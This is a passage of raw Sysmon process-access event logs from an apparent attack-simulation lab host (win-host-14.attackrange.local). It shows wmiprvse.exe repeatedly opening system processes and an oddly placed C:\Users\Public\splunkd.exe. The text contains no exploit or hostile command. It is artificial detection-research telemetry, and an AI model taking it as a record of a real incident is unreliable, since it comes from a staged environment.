ft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150168Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F6F-60CA-6200-00000000D101}3968C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150167Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F67-60CA-3500-00000000D101}2568C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150166Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F67-60CA-3500-00000000D101}2568C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150165Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F66-60CA-3100-00000000D101}2104C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150164Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F66-60CA-3100-00000000D101}2104C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150163Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F66-60CA-2700-00000000D101}2648C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150162Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F66-60CA-2700-00000000D101}2648C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150161Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1F00-00000000D101}1340C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150160Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1F00-00000000D101}1340C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150159Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1E00-00000000D101}1056C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150158Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1E00-00000000D101}1056C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150157Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150156Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150155Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1A00-00000000D101}1928C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150154Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1A00-00000000D101}1928C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150153Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1900-00000000D101}1808C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150152Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1900-00000000D101}1808C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150151Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1800-00000000D101}1548C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150150Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1800-00000000D101}1548C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150149Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1700-00000000D101}1284C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150148Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1700-00000000D101}1284C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150147Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1600-00000000D101}1164C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150146Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1600-00000000D101}1164C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150145Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1500-00000000D101}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150144Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 